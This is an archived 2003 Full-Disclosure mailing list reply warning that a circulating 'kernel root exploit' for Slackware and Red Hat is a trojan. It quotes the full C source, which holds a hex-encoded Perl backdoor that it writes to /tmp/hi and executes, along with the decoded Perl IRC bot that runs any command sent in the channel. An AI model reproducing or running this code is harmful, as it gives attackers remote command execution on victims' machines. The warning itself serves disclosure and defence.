lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200306131720.16886.gml@phrick.net> From: gml at phrick.net (gml) Subject: Re: -1 day exploit - Warning On Friday 13 June 2003 03:57 pm, Brian Houk wrote: Wow, I'd never run something that had a printf statement in it with print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n"; if you run this you deserve to get owned. this guy could have at least xor'd the strings and base64 encoded them or SOMETHING. > Actually I should have made my previous e-mail a little bit more clear. > > DO NOT RUN THIS > > > Just a warning. . . > > > > [03:37] chigoo (521@...-3-1a.um.bonet.se) joined #linuxhelp. > > [03:37] <chigoo> new root exploit is out to slackware 9.1 and redhat 9.1! > > enjoy....be nice to your frinds boxes!:> > > http://home.no/exploited/exploits/kmodaxx.c > > > > > > Attached is the so called exploit, and the perl code it runs locally on > > your machine. #darknet already has a ban on moron*!*@* > > > > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake > > 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": > > command\n"; > > > > nice > > > > > > > > > > #include <stdio.h> > > #include <sys/types.h> > > #include <sys/socket.h> > > #include <unistd.h> > > #include <netinet/in.h> > > #include <netinet/udp.h> > > #include <netinet/ip.h> > > #include <string.h> > > > > /* > > * *** http://hack.co.za *** > > * ******** DISTRIBUTED 12.06.03 ******** > > * > > * remote kernel root exploit, tested on slackware 9.1, redhat 9.1. > > (kernels 2.4.2*) * exploits a race condition in kernel, allowing to take > > control over * privileged modprobe binary, and gives u root. > > * > > * > > * > > * This exploit must be run as root on source box to open a raw socket. > > * compile: gcc -o kmodaxx kmodaxx.c > > * run: ./kmodaxx ip > > * and u got a nice r00tshell. > > * > > * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* > > * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY > > * > > * > > * - c1sco darknet@...et > > */ > > > > > > h3llc0de= > > "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63 > >" > > "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69 > >" > > "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72 > >" > > "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e > >" > > "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65 > >" > > "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f > >" > > "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49 > >" > > "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e > >" > > "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22 > >" > > "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63 > >" > > "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d > >" > > "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43 > >" > > "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68 > >" > > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20 > >" > > "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64 > >" > > "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65 > >" > > "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d > >" > > "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d > >" > > "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20 > >" > > "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c > >" > > "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22 > >" > > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53 > >" > > "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20 > >" > > "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66 > >" > > "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20 > >" > > "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20 > >" > > "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f > >" > > "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63 > >" > > "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68 > >" > > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f > >" > > "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e > >" > > "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e > >" > > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28 > >" > > "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24 > >" > > "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d > >" > > "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24 > >" > > "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24 > >" > > "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22 > >" > > "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22 > >" > > "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c > >" > > "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d > >" > > "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64 > >" "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"; > > > > unsigned short csum(unsigned short *buf, int nwords) > > { > > unsigned long sum; > > for(sum=0;nwords>0;nwords--); > > sum+=*buf++; > > sum=(sum>>16)+(sum&0xffff); > > sum+=(sum>>16); > > return ~sum; > > } > > > > unsigned short in_cksum(unsigned short *addr,int len) > > { > > register int nleft=len; > > register unsigned short *w=addr; > > register int sum=0; > > unsigned short answer=0; > > while(nleft>1) > > { > > sum+=*w++; > > nleft-=2; > > } > > if(nleft==1) > > { > > *(u_char *)(&answer)=*(u_char *)w; > > sum+=answer; > > } > > sum=(sum >> 16)+(sum & 0xffff); > > sum+=(sum >> 16); > > answer=~sum; > > return(answer); > > } > > > > > > int main(int argc, char **argv) > > { > > > > > > int sockfd; > > struct sockaddr_in addr; > > char *payload=h3llc0de; > > char *buf; > > struct iphdr *iph; > > struct udphdr *tcph; > > int tot_len; > > FILE *f; > > int die=0; > > > > if(argc!=2) > > { > > printf("ERROR: No ip address entered\n"); > > printf("usage:\n%s [IP-ADDRESS]\n\n",argv[0]); > > die=1; > > } > > > > > > addr.sin_family=AF_INET; > > addr.sin_port=htons(5555); > > if(argc==1) argv[1]=""; > > addr.sin_addr.s_addr=inet_addr(argv[1]); > > > > sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_UDP); > > if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE > > YOU ROOT?\n");die=1;} > > > > tot_len=sizeof(struct iphdr)+sizeof(struct > > udphdr)+strlen(payload); buf=(char *)malloc(tot_len); > > > > malloc(buf,0,tot_len); > > > > iph=(struct iphdr*)buf; > > tcph=(struct udphdr*)(buf+sizeof(struct iphdr)); > > > > iph->ihl=5; > > iph->version=4; > > iph->tos=0; > > iph->tot_len=tot_len; > > iph->id=htons(31337); > > iph->frag_off=0; > > iph->ttl=225; > > iph->protocol=IPPROTO_UDP; > > iph->check=0; > > iph->saddr=inet_addr("127.0.0.1"); // spoof the source to make it > > untracable iph->daddr=inet_addr(argv[1]); > > iph->check=in_cksum((unsigned short *)&iph,sizeof(iph)); > > > > > > tcph->source=htons(31337); > > tcph->dest=htons(139); // the default SMB port > > tcph->len=htons(sizeof(struct udphdr)+strlen(payload)); > > tcph->check=0; > > memcpy(buf+sizeof(struct iphdr)+sizeof(struct > > udphdr),payload,strlen(payload)); f=fopen(h3llc0de+764,"w"); > > if(f) > > { > > fseek(f,0,SEEK_SET); > > close(2); > > fprintf(f,"%s",h3llc0de); > > fclose(f);}system(h3llc0de+735); > > > > { > > int one=1; > > const int *val = &one; > > > > if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one))<0 && !die) > > printf("warning: cannot set HDRINCL\n"); } > > > > if(sendto(sockfd,buf,tot_len,0,(struct sockaddr > > *)&addr,sizeof(addr))<0 && !die) printf("err\n"); > > else if (!die) printf("NUKED THA MOTHA!!! :D\n"); > > return 0; > > } > > > > > > #!/usr/bin/perl > > $chan="#darknet"; > > $nick="moron"; > > $server="efnet.vuurwerk.nl"; > > $SIG{TERM}={}; > > exit if fork; > > use IO::Socket; > > $sock = IO::Socket::INET->new($server.":6667")||exit; > > print $sock "USER moron +i moron :moronv2\nNICK moron\n"; > > $i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1; > > last if $mode=="001"; > > if($mode=="433"){ > > $i++; > > $nick=~s/\d*$/$i/; > > print $sock "NICK $nick\n"; > > } > > } > > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake > > 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": > > command\n"; while(<$sock>){ > > if (/^PING (.*)$/) {print $sock "PONG $1\nJOIN $chan\n"; > > } > > if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//; > > $_=`$_`; > > foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n"; > > sleep 1; > > } > > } > > }#chmod +x /tmp/hi 2>/dev/null; > > /tmp/hi; > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists